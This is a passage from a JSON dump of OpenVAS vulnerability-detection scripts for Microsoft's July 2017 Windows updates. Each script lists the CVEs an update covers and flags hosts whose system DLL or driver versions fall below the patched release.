License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811456\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8595\", \"CVE-2017-8598\", \"CVE-2017-8599\", \"CVE-2017-8601\",\n \"CVE-2017-8602\", \"CVE-2017-8603\", \"CVE-2017-8604\", \"CVE-2017-0170\",\n \"CVE-2017-8463\", \"CVE-2017-8605\", \"CVE-2017-8606\", \"CVE-2017-8607\",\n \"CVE-2017-8608\", \"CVE-2017-8467\", \"CVE-2017-8486\", \"CVE-2017-8495\",\n \"CVE-2017-8609\", \"CVE-2017-8611\", \"CVE-2017-8618\", \"CVE-2017-8619\",\n \"CVE-2017-8556\", \"CVE-2017-8557\", \"CVE-2017-8561\", \"CVE-2017-8562\",\n \"CVE-2017-8563\", \"CVE-2017-8564\", \"CVE-2017-8565\", \"CVE-2017-8573\",\n \"CVE-2017-8577\", \"CVE-2017-8578\", \"CVE-2017-8580\", \"CVE-2017-8581\",\n \"CVE-2017-8582\", \"CVE-2017-8585\", \"CVE-2017-8587\", \"CVE-2017-8588\",\n \"CVE-2017-8589\", \"CVE-2017-8590\", \"CVE-2017-8592\");\n script_bugtraq_id(99403, 99417, 99393, 99420, 99390, 99406, 99407, 99389, 99388,\n 99408, 99410, 99412, 99409, 99414, 99424, 99418, 99391, 99399,\n 99392, 99439, 99398, 99426, 99397, 99402, 99428, 99394, 99431,\n 99416, 99419, 99421, 99423, 99429, 99432, 99413, 99400, 99425,\n 99427, 99396);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-07-12 09:57:23 +0530 (Wed, 12 Jul 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4025344)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4025344\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Microsoft Windows fails to properly handle objects in memory.\n\n - The way that the Scripting Engine renders when handling objects in memory\n in Microsoft browsers.\n\n - The way JavaScript engines render when handling objects in memory in\n Microsoft browsers.\n\n - The way Microsoft Edge handles objects in memory.\n\n - When Windows Explorer improperly handles executable files and shares during\n rename operations.\n\n - when an affected Microsoft browser does not properly parse HTTP content.\n\n - when Windows improperly handles calls to Advanced Local Procedure Call (ALPC).\n\n - When Kerberos falls back to NT LAN Manager (NTLM) Authentication Protocol as\n the default authentication protocol.\n\n - The way that the Windows Kernel handles objects in memory.\n\n - The Microsoft Graphics Component fails to properly handle\n objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n who successfully exploited the vulnerability could gain the same user rights as\n the current user, could run arbitrary code, processes with elevated privileges.\n Also could take control of the affected system, leading to cause a denial of service.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1511 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4025344\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10586.0\", test_version2:\"11.0.10586.1006\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.10586.0 - 11.0.10586.1006\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:24:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8608", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8599", "CVE-2017-8587", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8606", "CVE-2017-8619", "CVE-2017-8607", "CVE-2017-8601", "CVE-2017-8565", "CVE-2017-8605", "CVE-2017-8561", "CVE-2017-8467", "CVE-2017-8585", "CVE-2017-8562", "CVE-2017-8495", "CVE-2017-8609", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8595", "CVE-2017-8611", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8602", "CVE-2017-8618", "CVE-2017-8463", "CVE-2017-8590"], "description": "This host is missing a critical security\n update according to Microsoft KB4025338", "modified": "2020-06-04T00:00:00", "published": "2017-07-12T00:00:00", "id": "OPENVAS:1361412562310811461", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811461", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4025338)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4025338)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811461\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8595\", \"CVE-2017-8599\", \"CVE-2017-8601\", \"CVE-2017-8602\",\n \"CVE-2017-0170\", \"CVE-2017-8463\", \"CVE-2017-8605\", \"CVE-2017-8606\",\n \"CVE-2017-8607\", \"CVE-2017-8608\", \"CVE-2017-8467\", \"CVE-2017-8486\",\n \"CVE-2017-8609\", \"CVE-2017-8611\", \"CVE-2017-8618\", \"CVE-2017-8619\",\n \"CVE-2017-8495\", \"CVE-2017-8556\", \"CVE-2017-8557\", \"CVE-2017-8561\",\n \"CVE-2017-8562\", \"CVE-2017-8563\", \"CVE-2017-8564\", \"CVE-2017-8565\",\n \"CVE-2017-8573\", \"CVE-2017-8577\", \"CVE-2017-8578\", \"CVE-2017-8580\",\n \"CVE-2017-8581\", \"CVE-2017-8582\", \"CVE-2017-8585\", \"CVE-2017-8587\",\n \"CVE-2017-8588\", \"CVE-2017-8589\", \"CVE-2017-8590\", \"CVE-2017-8592\");\n script_bugtraq_id(99403, 99393, 99420, 99390, 99389, 99388, 99408, 99410, 99412,\n 99409, 99414, 99418, 99391, 99399, 99392, 99424, 99439, 99398,\n 99426, 99397, 99402, 99428, 99394, 99431, 99416, 99419, 99421,\n 99423, 99429, 99432, 99413, 99400, 99425, 99427, 99396);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-07-12 08:32:30 +0530 (Wed, 12 Jul 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4025338)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4025338\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Microsoft Windows when Win32k fails to properly handle objects in memory.\n\n - The way that the Scripting Engine renders when handling objects in memory\n in Microsoft browsers.\n\n - The way JavaScript engines render when handling objects in memory in\n Microsoft browsers.\n\n - The way Microsoft Edge handles objects in memory.\n\n - When Windows Explorer improperly handles executable files and shares during\n rename operations.\n\n - when an affected Microsoft browser does not properly parse HTTP content.\n\n - when Windows improperly handles calls to Advanced Local Procedure Call (ALPC).\n\n - When Kerberos falls back to NT LAN Manager (NTLM) Authentication Protocol as\n the default authentication protocol.\n\n - The way that the Windows Kernel handles objects in memory.\n\n - The Microsoft Graphics Component fails to properly handle\n objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n who successfully exploited the vulnerability to gain the same user rights as\n the current user, run arbitrary code, processes with elevated privileges.\n Also could take control of the affected system and cause denial of service.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 for x86/x64-based Systems.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4025338\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_is_less(version:edgeVer, test_version:\"11.0.10240.17488\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: Less than 11.0.10240.17488\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:25:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8608", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8587", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8606", "CVE-2017-8607", "CVE-2017-8565", "CVE-2017-8561", "CVE-2017-8467", "CVE-2017-8562", "CVE-2017-8495", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8618", "CVE-2017-8463", "CVE-2017-8590"], "description": "This host is missing a critical security\n update according to Microsoft KB4025331", "modified": "2020-06-04T00:00:00", "published": "2017-07-12T00:00:00", "id": "OPENVAS:1361412562310811517", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811517", "type": "openvas", "title": "Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4025331)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4025331)\n#\n# Authors:\n# Rinu <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811517\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0170\", \"CVE-2017-8463\", \"CVE-2017-8606\", \"CVE-2017-8467\",\n \"CVE-2017-8486\", \"CVE-2017-8607\", \"CVE-2017-8608\", \"CVE-2017-8495\",\n \"CVE-2017-8556\", \"CVE-2017-8618\", \"CVE-2017-8557\", \"CVE-2017-8561\",\n \"CVE-2017-8562\", \"CVE-2017-8563\", \"CVE-2017-8564\", \"CVE-2017-8565\",\n \"CVE-2017-8573\", \"CVE-2017-8577\", \"CVE-2017-8578\", \"CVE-2017-8580\",\n \"CVE-2017-8581\", \"CVE-2017-8582\", \"CVE-2017-8587\", \"CVE-2017-8588\",\n \"CVE-2017-8589\", \"CVE-2017-8590\", \"CVE-2017-8592\");\n script_bugtraq_id(99389, 99408, 99409, 99414, 99410, 99412, 99424, 99439, 99399,\n 99398, 99426, 99397, 99402, 99428, 99394, 99431, 99416, 99419,\n 99421, 99423, 99429, 99413, 99400, 99425, 99427, 99396);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-07-12 10:01:25 +0530 (Wed, 12 Jul 2017)\");\n script_name(\"Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4025331)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4025331\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - An error in Microsoft Windows which fails to properly handle objects in\n memory.\n\n - An error in the way JavaScript engines render when handling objects in memory\n in Microsoft browsers.\n\n - An error in Windows Explorer which improperly handles executable files and\n shares during rename operations.\n\n - An affected Microsoft browser does not properly parse HTTP content.\n\n - Windows improperly handles calls to Advanced Local Procedure Call (ALPC).\n\n - Microsoft Windows when Kerberos falls back to NT LAN Manager (NTLM)\n Authentication Protocol as the default authentication protocol.\n\n - Windows Kernel improperly handles objects in memory.\n\n - The Windows kernel fails to properly initialize a memory address, allowing an\n attacker to retrieve information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass.\n\n - PSObject wraps a CIM Instance.\n\n - Microsoft Graphics Component fails to properly handle objects in memory.\n\n - VBScript engine, when rendered in Internet Explorer, improperly handles\n objects in memory.\n\n - Microsoft Browsers improperly handle redirect requests.\n\n - Microsoft Windows when Kerberos fails to prevent tampering with the SNAME\n field during ticket exchange.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Windows System Information Console when it improperly parses XML input\n containing a reference to an external entity.\n\n - Windows Performance Monitor Console when it improperly parses XML input\n containing a reference to an external entity.\n\n - Microsoft WordPad parses specially crafted files.\n\n - Windows Search improperly handles objects in memory.\n\n - Windows Explorer attempts to open a non-existent file.\n\n - Windows improperly handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n an attacker to obtain information to further compromise the user's system,\n gain the same user rights as the current user, run arbitrary\n code in the context of another user, trick a user by redirecting the user\n to a specially crafted website, run processes in an elevated context,\n retrieve the base address of the kernel driver from a compromised process,\n embed an ActiveX control marked 'safe for initialization' in an application or\n Microsoft Office document that hosts the Internet Explorer rendering engine,\n force the browser to send data that would otherwise be restricted to a\n destination web site of their choice, bypass Extended Protection for\n Authentication, read arbitrary files via an XML external entity (XXE)\n declaration and cause a denial of service.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2012.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4025331\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2012:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"mshtml.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"10.0.9200.22207\"))\n{\n report = 'File checked: ' + sysPath + \"\\mshtml.dll\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 10.0.9200.22207\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:50:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8608", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8587", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8606", "CVE-2017-8607", "CVE-2017-8594", "CVE-2017-8565", "CVE-2017-8561", "CVE-2017-8467", "CVE-2017-8562", "CVE-2017-8495", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8602", "CVE-2017-8618", "CVE-2017-8463", "CVE-2017-8590"], "description": "This host is missing a critical security\n update according to Microsoft KB4025336", "modified": "2019-12-20T00:00:00", "published": "2017-07-12T00:00:00", "id": "OPENVAS:1361412562310811518", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811518", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4025336)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4025336)\n#\n# Authors:\n# Rinu <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811518\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2017-8594\", \"CVE-2017-8602\", \"CVE-2017-0170\", \"CVE-2017-8463\",\n \"CVE-2017-8606\", \"CVE-2017-8607\", \"CVE-2017-8467\", \"CVE-2017-8486\",\n \"CVE-2017-8495\", \"CVE-2017-8608\", \"CVE-2017-8618\", \"CVE-2017-8556\",\n \"CVE-2017-8557\", \"CVE-2017-8561\", \"CVE-2017-8562\", \"CVE-2017-8563\",\n \"CVE-2017-8564\", \"CVE-2017-8565\", \"CVE-2017-8573\", \"CVE-2017-8577\",\n \"CVE-2017-8578\", \"CVE-2017-8580\", \"CVE-2017-8581\", \"CVE-2017-8582\",\n \"CVE-2017-8587\", \"CVE-2017-8588\", \"CVE-2017-8589\", \"CVE-2017-8590\",\n \"CVE-2017-8592\");\n script_bugtraq_id(99397, 99396, 99412, 99394, 99414, 99416, 99390, 99419, 99399,\n 99398, 99439, 99410, 99431, 99402, 99401, 99400, 99389, 99409,\n 99408, 99429, 99428, 99421, 99423, 99425, 99424, 99427, 99426,\n 99413);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-07-12 10:05:45 +0530 (Wed, 12 Jul 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4025336)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4025336\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists,\n\n - When Microsoft Windows fails to properly handle objects in memory.\n\n - The way JavaScript engines render when handling objects in memory in\n Microsoft browsers.\n\n - Windows Explorer improperly handles executable files and shares during\n rename operations.\n\n - An affected Microsoft browser does not properly parse HTTP content.\n\n - Windows improperly handles calls to Advanced Local Procedure Call (ALPC).\n\n - Microsoft Windows when Kerberos falls back to NT LAN Manager (NTLM)\n Authentication Protocol as the default authentication protocol.\n\n - Windows Kernel improperly handles objects in memory.\n\n - The Windows kernel fails to properly initialize a memory address,\n allowing an attacker to retrieve information that could lead to a Kernel\n Address Space Layout Randomization (KASLR) bypass.\n\n - PSObject wraps a CIM Instance.\n\n - Microsoft Graphics Component fails to properly handle objects in memory.\n\n - VBScript engine, when rendered in Internet Explorer, improperly handles\n objects in memory.\n\n - Microsoft Browsers improperly handle redirect requests.\n\n - Microsoft Windows when Kerberos fails to prevent tampering with the SNAME\n field during ticket exchange.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Windows System Information Console when it improperly parses\n XML input containing a reference to an external entity.\n\n - Windows Performance Monitor Console when it improperly parses XML\n input containing a reference to an external entity.\n\n - Microsoft WordPad parses specially crafted files.\n\n - Windows Search improperly handles objects in memory.\n\n - Windows Explorer attempts to open a non-existent file.\n\n - Windows improperly handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n an attacker to obtain information to further compromise the user's system,\n gain the same user rights as the current user, run arbitrary code in the\n context of another user, trick a user by redirecting the user\n to a specially crafted website, run processes in an elevated cretrieve the\n base address of the kernel driver from a compromised process, embed an\n ActiveX control marked 'safe for initialization' in an application or\n Microsoft Office document that hosts the Internet Explorer rendering engine,\n force the browser to send data that would otherwise be restricted to a\n destination web site of their choice, bypass Extended Protection for\n Authentication, read arbitrary files via an XML external entity (XXE)\n declaration and cause a denial of service.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 for 32-bit/x64\n\n - Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4025336\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Win32k.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.3.9600.18737\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Win32k.sys\",\n file_version:fileVer, vulnerable_range:'Less than 6.3.9600.18737');\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:28:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8587", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8565", "CVE-2017-8467", "CVE-2017-8495", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8463", "CVE-2017-8590"], "description": "This host is missing a critical security\n update according to Microsoft KB4025337", "modified": "2020-06-04T00:00:00", "published": "2017-07-12T00:00:00", "id": "OPENVAS:1361412562310811519", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811519", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4025337)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4025337)\n#\n# Authors:\n# Rinu <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811519\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0170\", \"CVE-2017-8463\", \"CVE-2017-8467\", \"CVE-2017-8486\",\n \"CVE-2017-8495\", \"CVE-2017-8556\", \"CVE-2017-8557\", \"CVE-2017-8563\",\n \"CVE-2017-8564\", \"CVE-2017-8565\", \"CVE-2017-8573\", \"CVE-2017-8577\",\n \"CVE-2017-8578\", \"CVE-2017-8580\", \"CVE-2017-8581\", \"CVE-2017-8582\",\n \"CVE-2017-8587\", \"CVE-2017-8588\", \"CVE-2017-8589\", \"CVE-2017-8590\",\n \"CVE-2017-8592\");\n script_bugtraq_id(99389, 99409, 99414, 99424, 99439, 99398, 99402, 99428, 99394,\n 99431, 99416, 99419, 99421, 99423, 99429, 99413, 99400, 99425,\n 99427, 99396);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-07-12 10:12:05 +0530 (Wed, 12 Jul 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4025337)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4025337\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists,\n\n - When Microsoft Browsers improperly handle redirect requests.\n\n - In Microsoft Windows when Win32k fails to properly handle objects in memory.\n\n - In Windows when the Microsoft Graphics Component fails to properly handle\n objects in memory.\n\n - In Microsoft Windows when Kerberos falls back to NT LAN Manager (NTLM)\n Authentication Protocol as the default authentication protocol.\n\n - When Windows Explorer improperly handles executable files and shares during\n rename operations.\n\n - When Windows improperly handles objects in memory.\n\n - In the Windows System Information Console when it improperly parses\n XML input containing a reference to an external entity.\n\n - In Microsoft Windows when Kerberos fails to prevent tampering with the SNAME\n field during ticket exchange.\n\n - In the way that Microsoft WordPad parses specially crafted files.\n\n - When Windows Search handles objects in memory.\n\n - When the Windows kernel fails to properly initialize a memory address,\n allowing an attacker to retrieve information that could lead to a Kernel\n Address Space Layout Randomization (KASLR) bypass.\n\n - In PowerShell when PSObject wraps a CIM Instance.\n\n - When Windows Explorer attempts to open a non-existent file.\n\n - In the Windows Performance Monitor Console when it improperly parses XML\n input containing a reference to an external entity.\");\n\n 